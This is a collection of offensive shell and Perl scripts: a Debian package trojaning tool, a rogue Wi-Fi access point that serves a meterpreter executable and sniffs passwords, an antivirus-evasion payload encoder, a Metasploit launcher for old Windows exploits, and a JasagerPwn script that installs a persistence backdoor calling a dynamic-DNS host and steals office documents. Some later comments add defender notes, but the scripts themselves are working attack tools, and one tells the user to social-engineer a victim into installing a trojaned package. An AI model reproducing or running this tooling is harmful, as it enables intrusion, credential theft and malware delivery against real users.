     4. Side Jacking
     5. AutoNmap
     6. PayloadGen
     7. Exit
EOF
echo 
echo 
echo -n "     LAK>"
}
# menu2 (main): loop forever showing menu1 and dispatching the answer:
# 1 wepcracker, 2 wpacracker, 3 sslsniff, 4 sidejack, 5 autonmap, 6 loop
# (payload generator), 7 exit. wpacracker is not defined in the visible
# part of this listing.
menu2() {

   while true
   do
   menu1
   read answer
   case $answer in
   1)
      wepcracker
  ;;   
   2)
      wpacracker
  ;;
   3)
      sslsniff
  ;;
   4)
      sidejack  
  ;;
   5)
      autonmap
  ;;
   6)
    loop
  ;;
   7)
  exit
  ;;
   *)
     menu2
  ;;
   esac
   done
}
# Script entry point: "help" and any unrecognised first argument start the
# main menu. The file, text and status arms call filoop, procloop and
# statloop, none of which is defined in the visible part of this listing.
case "$1" in
    help)
   menu2
  ;;

    file)
      filoop
   ;;
   
    text)
   procloop
  ;;

   status)
   statloop
  ;;      

    *)
   menu2
  ;;
esac

bash script to generate a Debian (.deb) package trojan using Metasploit payload

#!/bin/bash

# bash script to generate a Debian (.deb) package trojan using Metasploit payload
# Author:  Aaron Hine - @redmeat_uk
# Date: 31-01-2010

# Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an individual or company.  
# The author is not liable for any illegal use of this script.

# What it does: downloads a real package with apt, unpacks it, adds a
# generated executable plus a postinst script that launches it, and rebuilds
# the tree into a .deb placed in a web root.
#
# Defender view: the rebuilt package is not the archive's package. Its
# checksum does not match the signed repository index (the script strips
# the SHA* fields from the control file for that reason), so installing
# through a configured apt repository would reject it; it only works when
# someone installs a downloaded .deb directly, where no origin check is
# made. Before installing a .deb from outside a repository, list its
# maintainer scripts and contents (dpkg-deb --info / --contents) and look
# for a postinst that backgrounds binaries or an extra setgid file next to
# the real executable.

scriptname=`basename "$0"`

  # Needs root: it calls apt-get and moves files out of the apt cache.
  if [[ $UID -ne 0 ]]; then
     echo "${scriptname} must be run as root"
     exit 1
  fi

# 
echo
echo "#####################################################################"
echo "Script to generate a Debian package trojan using a Metasploit payload"
echo "#####################################################################"
echo 

# change these vars to suit your needs
msfdir="/opt/metasploit3/msf3"
tmpdir="/tmp/evildeb"
workdir="$tmpdir/work"

# prompt for package name and setup dirs
echo "Please enter the name of the APT package you wish to trojan:"
echo "Use apt-cache search <package> for ideas :)"
echo
read package
# Fetch the genuine package into the apt cache without installing it, then
# move it to the work area and unpack it.
apt-get --download-only install $package
echo
mkdir $tmpdir
mkdir $workdir
mv /var/cache/apt/archives/$package* $tmpdir
mkdir $workdir/DEBIAN
dpkg -x $tmpdir/$package* $workdir
# The control file is rebuilt from `apt-cache show` with the
# Original-Maintainer and SHA* lines removed.
apt-cache show $package > $workdir/DEBIAN/control
cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control
echo
echo "Please choose your Metasploit payload"
echo "-------------------------------------"
echo 
echo "1. bind tcp"
echo "2. reverse tcp"
echo
echo "press number and hit return:"
read choice


# payload/options are only set for choices 1 and 2; any other answer leaves
# both variables empty.
if [ "$choice" -eq 1 ]; then
        payload="linux/x86/shell/bind_tcp"
                echo "Enter IP:"
                read rhostIP
                echo "Enter port:"
                read bindport
                options="RHOST=$rhostIP LPORT=$bindport"
else
        if [ "$choice" -eq 2 ]; then
                payload="linux/x86/shell/reverse_tcp"
                echo "Enter IP:"
                read lhostIP
                echo "Enter port:"
                read revport
                options="LHOST=$lhostIP LPORT=$revport" 
        fi
fi

echo
echo "Please enter the filename for the Metasploit payload:"
read filename
echo

cd $workdir
# binary: path(s), relative to the package root, of executable files whose
# path contains the package name.
binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`
trojan="$filename"

echo "Making post-install script..."
echo

# postinst runs as root at install time: it sets mode 2755 on the added
# file, starts it in the background and also starts the original binary.
echo "#!/bin/sh" > $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst

trojan2=`echo $binary$trojan | sed -e 's/^\///'`

echo "Thanks - generating your payload..."
$msfdir/msfpayload $payload $options X > $workdir/$trojan2
echo

cd $workdir/DEBIAN
chmod 755 postinst
dpkg-deb --build $workdir
cd $tmpdir

echo
echo "Please enter your webroot directory:"
read webroot
mv $tmpdir/work.deb $webroot/$package.deb
# Removes the whole work area, including the genuine package copy.
rm -rf $tmpdir

echo
echo "Trojan'd $package.deb created and placed in $webroot"
echo

webserver="python -m SimpleHTTPServer 80"

echo "Would you like a Python webserver ? (y/n) :"
read svr
echo

# Optional: serve the web root over plain HTTP on port 80 in the background.
if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
        cd $webroot
        $webserver & 
        echo
        else
           echo "Fair nuff, setup your own webserver :)"
           echo
fi

sleep 1

echo "Would you like me to setup a metasploit handler ? (y/n) :"
echo
read handler
echo
echo "In the meantime, social engineer your victim in to browsing to your package"
echo "and get them to install it and wait for your root shell >)"
echo

# Optional: start the matching listener in the foreground.
if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
        echo
        $msfdir/msfcli exploit/multi/handler payload=$payload $options E
        else
                echo "Fair nuff, setup your own handler :)"
                echo
fi

FakeAP_pwn.sh

#! /bin/bash

# (C)opyright 2009 - g0tmi1k

#

# FakeAP_pwn.sh

# What it does: brings up an open access point, hands out addresses on
# 10.0.0.0/24, sends every HTTP request to a local web server that offers
# an executable, waits for a marker file, then restores forwarding and
# starts sniffers on wlan0.
# NOTE(review): the listing as published contains typographic quotes and
# dashes in place of ASCII ones.
#
# Defender view, from values visible below: open SSID "Free WiFi", client
# subnet 10.0.0.0/24 with gateway 10.0.0.1, download named MS016455.exe,
# and a listener on TCP 7332. Only port 80 is redirected, so sites reached
# over HTTPS with HSTS are not affected by the redirect; the chain still
# needs the user to run the downloaded file. Not auto-joining open networks
# and application allowlisting both break it.

# Settings

export  gatewayip=192.168.1.1

export internet_interface=wlan0

export   fakeap_interface=wlan1

echo “[>] Starting: FakeAP_pwn - g0tmi1k”

# FakeAP

echo “[+] Setting up FakeAP”

modprobe tun 

# Access point on $fakeap_interface in its own xterm; creates the at0 tap
# interface used below.
xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e “Free WiFi” $fakeap_interface -v&

sleep 2

# Tables

echo “[+] Setting up forwarding tables…”

ifconfig lo up

ifconfig at0 up

ifconfig at0 10.0.0.1 netmask 255.255.255.0 

ifconfig at0 mtu 1400

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

# Flushes every existing filter and nat rule on this host before adding its
# own.
iptables —flush

iptables —table nat —flush

iptables —delete-chain

iptables —table nat —delete-chain

echo 1 > /proc/sys/net/ipv4/ip_forward

# All UDP (which includes DNS) is sent to $gatewayip.
iptables -t nat -A PREROUTING -p udp -j DNAT —to $gatewayip

#iptables -P FORWARD ACCEPT

iptables —append FORWARD —in-interface at0 -j ACCEPT

iptables —table nat —append POSTROUTING —out-interface $internet_interface -j MASQUERADE

# DHCP

echo “[+] Setting up DHCP server…”

xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0&

sleep 2

# Need the user to come here

echo “[+] Start web server…”

#xterm -geometry 75x25+1+200  -T WebServer -e sh -c “start-apache”&

xterm -geometry 75x25+1+200  -T WebServer -e /etc/init.d/apache2 start

sleep 2

# So lets force them!

echo “[+] Force user to vist our site…”

# Every TCP/80 connection from clients is rewritten to the local web server.
iptables -t nat -A PREROUTING -p tcp —dport 80 -j DNAT —to 10.0.0.1

# Bad boy stuff!

echo “[+] Here comes metasploit…”

cd /pentest/exploits/framework3

# Writes the executable into the web root under the name MS016455.exe.
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe

echo “[+] Uploading SBD…”

xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&

sleep 2

# upload //root/FakeAP_pwn/ C:/

# execute -f “C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1”

#./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc

# Wait till user is connected

# /tmp/FakeAP_pwn.tmp is the marker polled below; nothing in this listing
# creates it, so presumably fakeap_pwn.rb does -- confirm.
rm -r /tmp/FakeAP_pwn.tmp

echo “[-] Waitng for target to connect…”

while [ ! -e /tmp/FakeAP_pwn.tmp ]; do

sleep 1

done

# They give us access to their system, so lets give them internet back ;)

echo “[+] Give them (our) internet back…”

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

# Same rule set as before, rebuilt without the port-80 redirect.
iptables —flush

iptables —table nat —flush

iptables —delete-chain

iptables —table nat —delete-chain

iptables -t nat -A PREROUTING -p udp -j DNAT —to $gatewayip

#iptables -P FORWARD ACCEPT

iptables —append FORWARD —in-interface at0 -j ACCEPT

iptables —table nat —append POSTROUTING —out-interface $internet_interface -j MASQUERADE

# Lets connect! =)

# *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***

echo “[+] Lets us back in…”

# sbd listener on TCP 7332; the shared key is passed on the command line
# and is therefore visible in the process list.
konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332&

sleep 2 

# Get as much info as poss!

echo “[+] Watch what they do…”

# The three sniffers below are bound to the literal interface wlan0, not to
# $internet_interface.

# URLs

xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&

# Passwords

xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&

# IM Chats

xterm -geometry 100x10+470+300 -T “IM Chat” -e msgsnarf -i wlan0&

echo 

echo “[+] DONE - Have you, g0tmi1k?”

# Lets get some stuff from metasploit whistle we are at it!

#sysinfo

#getuid

#use priv

#hashdump > /tmp/FakeAP_pwn-hash.txt

##session -l

##session -i 1

# Lets crack the hash

#cd /pentest/passwords/jtr/

#./john /tmp/FakeAP_pwn-hash.txt

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp

#!/bin/bash

# Pipes a raw Metasploit reverse-shell payload (msfpayload ... R) into msfencode,
# which embeds it in an existing Windows executable given as the third argument
# and writes the result next to it as <name>-out.exe.
# Arguments: $1 callback IP, $2 callback port, $3 template binary.
#
# NOTE(review), defender view: the output is a modified copy of the template
# binary, so it no longer matches the vendor's published hash and a signature
# carried by the original should no longer validate. Hash/signature checks on
# downloaded executables and egress filtering of unexpected outbound
# connections are the controls that apply here; the encoder passes are aimed
# at static signatures only.

# counts to mangle the trojan to avoid av detect

# keep low we want close to normal filesize for user not to suspect anything

count=15

# Fewer than three arguments: print usage and leave. The exit status is 0, so
# a caller cannot tell this apart from a successful run.
if [[ -z $3 ]];then

        echo “usage $(basename $0) <revservip> <revservport> <binary filename>”

        echo “to attach to filename_out.exe”

        echo “doesn’t work well for PU binaries, they say”

        exit 0

else

        ip=$1

        port=$2

        bin=$3

        tdir=$(dirname $bin)

        echo “encoding ${bin}-out.exe , mangling $count times”

fi

# -x names the template executable, -c the number of encoder passes ($count).
msfpayload windows/shell/reverse_tcp LHOST=${ip} LPORT=${port} R | \

    msfencode -x “${tdir}/${bin}” -t exe -e x86/shikata_ga_nai -o “${tdir}/${bin%%.*}-out.exe” -c $count

#        msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 E

F*ck MS Exploit Menu

print “##############################\n”;

print “#                            #\n”;

print “#   ##### #   #   ##  #  #   #\n”;

print “#   #     #   #  #  # # #    #\n”;

print “#   ####  #   # #     ##     #\n”;

print “#   #     #   #  #  # # #    #\n”;

print “#   #      ###    ##  #  #   #\n”;

print “#                            #\n”;

print “# #    # #   ##  ###    ##   #\n”;

print “# # # ## #  #  # #  #  #  #  #\n”;

print “# #  # # # #     ###  #    # #\n”;

print “# #    # #  #  # #  #  #  #  #\n”;

print “# #    # #   ##  #   #  ##   #\n”;

print “#                            #\n”;

print “#   ##    ##   ##### ######  #\n”;

print “#  #  #  #  #  #        #    #\n”;

print “#   #   #    # ####     #    #\n”;

print “# #  #   #  #  #        #    #\n”;

print “#  ##     ##   #        #    #\n”;

print “#                            #\n”;

print “##############################\n”;

system(“sleep 3”);

system(“clear”);

# Menu loop for the launcher. There is no loop construct: the label below is the
# re-entry point, and each `goto SploitMenu;` placed between the sub definitions
# sends control back here after an option has run.
# NOTE(review), defender view: every option maps to a Microsoft bulletin dated
# 2003-2010 (the MS-yy-nnn ids printed below), so patch level is the primary
# control; the bind_tcp payload used throughout has the target open a listening
# port, which host firewalls and listener baselining are positioned to catch.
SploitMenu:

print ” ##################\n”;

print ” #  Exploit Menu  #\n”;

print ” ##################\n”;

print ” 1 - Run MS-08-067 \n”;

print ” 2 - Run MS-10-061 \n”;

print ” 3 - Run MS-03-026 \n”;

print ” 4 - Run MS-04-031 \n”;

print ” 5 - Run MS-07-029 \n”;

print ” 6 - Exit          \n”;

print “—————————-\n”;

print “\n\nCh0mpy-Pwn>”;    

$choice =<STDIN> ;

# == compares numerically. $choice is never chomped, and non-numeric input
# numifies to 0, so it matches no option and falls through to the first goto.
if ($choice==1){&ms08067};

if ($choice==2){&ms10061};

if ($choice==3){&dcom};

if ($choice==4){&netdde};

if ($choice==5){&zonename};

if ($choice==6){&exit};

# Option 1: prompt for a target and run msfcli with the MS08-067 module.
# NOTE(review): $target comes straight from STDIN (no chomp, no validation) and
# is interpolated into a single-string system() call, which Perl hands to the
# shell when the string contains shell metacharacters. Matching it against an
# IP-address pattern and using list-form system() keeps operator input from
# being parsed as shell syntax. The four subs below repeat this pattern.
sub ms08067

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-08-067 on them and gives you a Meterpreter shell \n”;

print ” Conficker Style liek a baws \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms08_067_netapi RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

# Option 2: same flow as ms08067, with the MS10-061 module path.
sub ms10061

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-10-061 on them and gives you a Meterpreter shell \n”;

print ” Owning liek a Stuxnet \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms10_061_spoolss RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

# Option 3: same flow as ms08067, with the MS03-026 module path.
sub dcom

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-03-026 on them and gives you a Meterpreter shell \n”;

print ” Dcom vulns… Patch plz lol \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

# Option 4: same flow as ms08067, with the MS04-031 module path.
sub netdde

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-04-031 on them and gives you a Meterpreter shell \n”;

print ” moar old vulns… Patch plz lol \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/smb/ms04_031_netdde RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

# Option 5: same flow as ms08067, with the MS07-029 module path.
sub zonename

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-07-029 on them and gives you a Meterpreter shell \n”;

print ” No idea how this one works bro \n”;

print “\n\nTarget>”;    

my $target =<STDIN> ;

system(“msfcli windows/dcerpc/ms07_029_msdns_zonename RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

# Option 6. Invoked as &exit from the menu; the bare `exit` in the body should
# resolve to Perl's built-in rather than recursing, ending the program.
# TODO confirm.
sub exit

{

exit

}

Motioncity13’s Option Menu

#!/bin/bash

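# Print the given text as a prompt and wait for the user to press Enter.
# Arguments: all arguments, joined with spaces, form the prompt text.
# Outputs:   the typed line is left in REPLY and otherwise ignored.
function pause(){

   # Straight quotes replace the typographic ones left behind by the page
   # extraction; -r stops read from eating backslashes in the typed line.
   read -r -p "$*"

}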

# Prompts for a payload name, LHOST and LPORT. Answering "y" to the next prompt
# asks for a filename and writes msfpayload's executable (X) output to it;
# any other answer starts an msfcli multi/handler with the same settings.
# NOTE(review): read is used without -r, and $pay, $lh, $lp and $fil are
# expanded unquoted, so typed values are word-split and glob-expanded before
# the tools see them. $fil is a redirect target: an existing file at that path
# is truncated without confirmation.
function listner () {

echo -n “Enter Payload: “

read pay

echo -n “Enter LHOST: “

read lh

echo -n “Enter LPORT: “

read lp

    echo -n “Create Payload (y/n)? “

read t1

if [ “$t1” = “y” ]; then {

    echo -n “Filename (*.exe): “

    read fil

    msfpayload $pay LHOST=$lh LPORT=$lp X > $fil

    }

else

msfcli exploit/multi/handler PAYLOAD=$pay LHOST=$lh LPORT=$lp E

fi

}

# Reads one address from the user and runs three nmap passes against it in
# sequence: a ping scan (-sP), OS detection (-O) and a SYN scan (-sS), calling
# pause between them and clearing the screen at the end.
# NOTE(review): $ip is expanded unquoted, so a typed value containing spaces or
# starting with '-' reaches nmap as extra targets or options. -O and -sS need
# raw-socket privileges, so the script presumably runs as root.
# Defender view: the three passes in a row against one address (sweep, OS
# fingerprint, half-open SYN scan) are the sort of sequence network IDS scan
# rules are written for.
function nmp () {

echo -n “NMAP IP Address Scanner”

echo

echo “IP Address: “

read ip

echo

echo “First we are going to do a ping scan.”

sleep 2

nmap -sP $ip

pause ‘Press any key to continue…’

echo

echo “Next we are going to scan for the Operating System the slave is running on.”

sleep 2

nmap $ip -O

pause ‘Press any key to continue…’

echo

echo “Next we detect open ports on the target.”

sleep 2

nmap -sS $ip

echo

pause ‘Press any key to continue…’

clear

}

echo ”           Menu List”

echo ”          —————-“

echo “Motioncity13’s Option Menu (First Bash Code)” 

echo

echo “1) Metasploit Payload Generator and Listener”

echo “2) NMAP Scanner”

echo “3) Quit”

echo

while [ 1 ]

do

read op

case “$op” in

  “1” )

  #Call Metasploit Function

  listner 

  ;;

  “2” )

  #Call NMP Function

  nmp

  ;;

  “3” )

  echo

  exit 0

  ;;

* )

   echo

   echo “Wrong selection.”

  ;;

esac

done

#echo

#exit 0

JasagerPwn Attack

#!/bin/bash

#leg3nd’s JasagerPwn Attack - v1.1 Final - rev8

#ATTACKS - browserPwn - Redirect LAN to Metasploit's auxiliary module browser autoPwn for sessions

# - FakeUpdate - Redirect LAN to fake update page with metasploit payload download.

# - Java Applet - Redirects LAN to a java applet with meterpreter payload. via SET.

# - Sniffer - Just picks up traffic with no ARP poisoning, and perfect ssl stripping

# - DeAuth - Deauths nearby clients from their APs and try to make them join yours

#

# Allows control of internet transparency of all attacks via built in bash menu.

# Requires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite

#          Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger.

#

# Created for and tested with an RTL8187 monitor mode card, and a open-WRT Fon+ (Pineapple).

# For More Information refer to INSTALL_HOWTO, usage information -h / -?, or post on Hak5 Forums.

#SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION

IFACE=”eth1” #Connection to the internet (gateway), EG wlan0,eth1,usb0,ppp0,etc

WiFiMODE=”1” #Use WiFi For Internet Gateway (Will create a DeAuth Rule so you dont own yourself) EG 0,1

fonIP=”192.168.10.2”  #Fon router Iface IP, this is -HARDCODED- to 192.168.10.0 subnet, the dhcp.conf is below to change.

FONIFACE=”eth2” #Interface facing the Jasager router

WIFACE=”wlan0” #Wireless Interface, EG wlan0,ath0,wifi0

MIFACE=”mon0” #Monitor Interface for Attacks

#Macchanger, ONLY FOR ATTACK INTERFACES

macMode=”set” #Mac spoofing mode - set / random  (case sensitive)

fakeMac=”00:e0:f7:99:e1:30”  # 00:e0:f7:99:e1:30 (Cisco Systems, Inc.) lawl

ourAPmac=”00:12:CF:A4:DF:26”  #Pineapple MAC so we dont DeAuth Ourselves!

msfpath=”/pentest/exploits/framework3”  #Metasploit Location (if not BT5, use msf3 directory)

SETpath=”/pentest/exploits/set” #Social Engineering Toolkit Location

DomainName=”Networking.com”  #Domain name for DHCP configuration.

######################################################################################################################

#Funcion can be used to customize post-exploit meterpreter script. This example steals documents and adds a DNS backdoor.

#This slightly modified persistence script supports D-DNS tracking (like dyndns.org or no-ip)

autoMetScript=”0”  #Allows you to automaticlly run a meterpreter persistence script on the victim.

Pport=”31337” # persistence backdoor port

PersIP=”Your.dyndns-ip.com” # Your dyndns or no-ip for backdoors

# Regenerates $SETpath/src/program_junk/multi_meter.file: deletes any existing
# copy, then writes three script lines into it (a persistence_dns call using
# $PersIP/$Pport and two file_collector calls that gather office documents and
# copy them to $SPWD/collected/).
# NOTE(review), defender view: what this leaves on an affected host is a
# persistence entry that calls out every 60 seconds (-i 60) to a dynamic-DNS
# name on a fixed port, plus a bulk read of *.doc/*.pdf/*.xls/*.docx under the
# user profile tree. Autorun-entry monitoring, egress filtering to dynamic-DNS
# domains and file-access auditing are the matching detection points.
function metScript(){

    if [ -e “$SETpath/src/program_junk/multi_meter.file” ] ; then rm “$SETpath/src/program_junk/multi_meter.file” ; fi #Dont touch this line

    # EDIT METERPRETER SCRIPT BELOW THIS, INSIDE THE ECHO QUOTES

    echo -e “persistence_dns -r $PersIP -p $Pport -i 60 -X -A

    file_collector -d c:\Users\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files

    file_collector -i /tmp/files -l $SPWD/collected/

    ” > $SETpath/src/program_junk/multi_meter.file #DONT CHANGE THIS PATH

}

#DHCP Configuration - Change if you want a different subnet.

# Replaces the system DHCP server configuration with one for the 192.168.10.0/24
# subnet served on $FONIFACE. An existing /etc/dhcp3/dhcpd.conf is first moved
# to dhcpd.conf.ORIGINAL, and a stale /tmp/dhcpd.conf is removed.
# NOTE(review): these are top-level statements placed before the getopts loop
# further down the file, so they run on every invocation, including -h. If a
# previous run ended without restoring the backup, the mv overwrites the real
# .ORIGINAL with the generated file.
# Defender view: clients that take a lease here receive $fonIP as their DNS
# server and 192.168.10.2 as their router, with 60-second leases, so name
# resolution and routing are both under the operator's control. The client-side
# mitigations are not auto-joining open or look-alike SSIDs and tunnelling
# traffic (VPN) on untrusted wireless networks.
if [ -e “/etc/dhcp3/dhcpd.conf” ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi

if [ -e “/tmp/dhcpd.conf” ]; then rm /tmp/dhcpd.conf; fi

echo -e “#jasagerPwn.dhcp

ddns-update-style none;

one-lease-per-client false;

authoritative;

ignore client-updates;

default-lease-time 60; # 24 hours=86400

max-lease-time 72;  # 48 hours=172800

log-facility local7;\n

subnet 192.168.10.0 netmask 255.255.255.0 {

interface $FONIFACE;

range 192.168.10.3 192.168.10.254;

option routers 192.168.10.2;

option subnet-mask 255.255.255.0;

option broadcast-address 192.168.10.255;

option domain-name-servers $fonIP;

option domain-name "$DomainName";

allow unknown-clients;

}” » /etc/dhcp3/dhcpd.conf

####-END SCRIPT CONFIG-######

#====================================================================================================================

####################################################################################################################

#SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE

#REQUIRED CHECKS FOR FUNCTIONALITY

version=”1.1”

rev=”8”

Jwww=”/var/www/javapwn”

Gwww=”/var/www/google”

Fwww=”/var/www/fakeupdate”

gatewayIP=`route -n | awk ‘/^0.0.0.0/ {getline; print $2}’`

WIFcheck=`ifconfig | grep $WIFACE | awk ‘{ print $1 }’`

IFcheck=`ifconfig | grep $IFACE | awk ‘{ print $1 }’`

NOW=$(date +”%b-%d_%H:%m:%S”)

sslport=”11000”

SPWD=`echo $PWD`

osxPORT=”30505”

nixPORT=”30504”

winPORT=”30503”

pyPORT=”30502”

javasite=”1”

sniffing=”0”

wasSniffing=”0”

fakeupdate=”0”

browserpwn=”0”

javaATK=”0”

z=”1”

moncheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

ATKcheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

ourIP=`ifconfig $FONIFACE | awk ‘/inet addr/ {split ($2,A,”:”); print A[2]}’`

wifiMAC=`ifconfig $IFACE | grep “HWaddr” | awk ‘{print $5}’ | tr “[a-z]” “[A-Z]”`

googleRev=`wget -qO- “http://jasagerpwn.googlecode.com/svn/trunk/” | grep “<title>jasagerpwn - Revision” |  awk -F ” ” ‘{split ($4,A,”:”); print A[1]}’`

trap ‘cleanup’ 2 # Interrupt - “Ctrl + C”

#———————————————————————————————————-

function help() { #help

   echo “

      - Version $version - Revision $rev -

(C)opyright 2011 leg3nd @ www.info-s3curity.com

 Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55]

                        -p [31337]     -a [0/1]        -w [interface]

 Options:

   -a [0/1]             :  Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript

   -p [31337]           :  Auto-Run Scripts persistence Port. Current = $Pport

   -i [interface] :  Internet Gateway Interface. Current = $IFACE

   -w [interface] :  WiFi Card Interface. Current = $WIFACE

   -d [0/1] :  WiFi Gateway Mode - Adds DeAuth Rule For Yourself. Current = $WiFiMODE

   -m [random/set] :  Change the Attack Interfaces MAC Address. Current = $macMode

   -s [MAC] :  Use this MAC Address. Requires -m. Current = $fakeMac

   -u :  Update script and its resources from Google Code.

   -U :  Update script, SET, and Metasploit.

   -? / -h :  Help Screen and Switches. More Information In top of script.

 For Installation, setup, and more information, please reference the INSTALL file, wiki, or 

 Post on the hak5 forums. Please leave comments in the Hak5 thread!

   exit 1

}

# Resets the firewall and puts the host into plain routing mode for clients on
# $FONIFACE: flushes and deletes all filter and nat chains (each command in its
# own xterm), sets the FORWARD policy to ACCEPT, forwards new connections from
# $FONIFACE to $IFACE, sends UDP/53 arriving on $FONIFACE to $gatewayIP,
# masquerades traffic leaving $IFACE and assigns $fonIP to $FONIFACE.
# NOTE(review): the flush removes whatever host firewall policy was loaded
# before the script started and nothing here saves it. cleanup() later runs
# only `iptables -F` and `iptables -X`, so the nat rules and the FORWARD ACCEPT
# policy set below stay in place after the script exits. An iptables-save
# snapshot taken before the first flush would allow a real restore.
function IPTABLES(){

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables —flush”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables —table nat —flush”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables —delete-chain”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables —table nat —delete-chain”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables -X”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables -F”

  sleep 4

  iptables -P FORWARD ACCEPT

  iptables -A FORWARD -m state —state ESTABLISHED,RELATED -j ACCEPT

  iptables -A FORWARD -i $FONIFACE -o $IFACE -m state —state NEW -j ACCEPT

  iptables -t nat -A PREROUTING —in-interface $FONIFACE -p udp —dport 53 -j DNAT —to $gatewayIP

  iptables —append FORWARD —in-interface $FONIFACE -j ACCEPT

  iptables —table nat —append POSTROUTING —out-interface $IFACE -j MASQUERADE

  ifconfig $FONIFACE $fonIP

}

# Resets the firewall like IPTABLES() and then redirects instead of routing:
# UDP and TCP arriving on $FONIFACE are DNATed to $fonIP and the remaining
# traffic is REDIRECTed to the local host. If sslstrip was active ($sniffing is
# 1) its tail window and process are killed first, the previous state is kept
# in $wasSniffing and $sniffing is cleared.
# NOTE(review): the same flush-without-snapshot caveat as IPTABLES() applies.
# The last PREROUTING rule appended below has no jump target, so it can only
# count packets.
# Defender view: a client behind this box sees every hostname answer from the
# same address; certificate errors on HTTPS sites and identical content for
# unrelated domains are the visible symptoms.
function ipTableRedirect {

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables —flush”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables —table nat —flush”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables —delete-chain”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables —table nat —delete-chain”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables -X”

  xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Clearing IPTables”   -e “iptables -F”

  sleep 4

  if [ $sniffing -eq “1” ] ; then

    #iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-ports $sslport

    #iptables —table nat —append PREROUTING —proto tcp —destination-port 80 —jump REDIRECT —to-port 80

    xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Tail” -e “kill $TAILPID” &

    xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing SSLStrip” -e “killall -9 sslstrip” &

    wasSniffing=$sniffing

    sniffing=”0”

  fi

  iptables -P FORWARD ACCEPT

  iptables —append FORWARD —in-interface $FONIFACE -j ACCEPT

  iptables —table nat —append POSTROUTING —out-interface $IFACE -j MASQUERADE

  iptables -t nat -A PREROUTING —in-interface $FONIFACE -p udp -j DNAT —to $fonIP

  sleep .5

  iptables —table nat —append PREROUTING —in-interface $FONIFACE —proto tcp —jump DNAT —to $fonIP

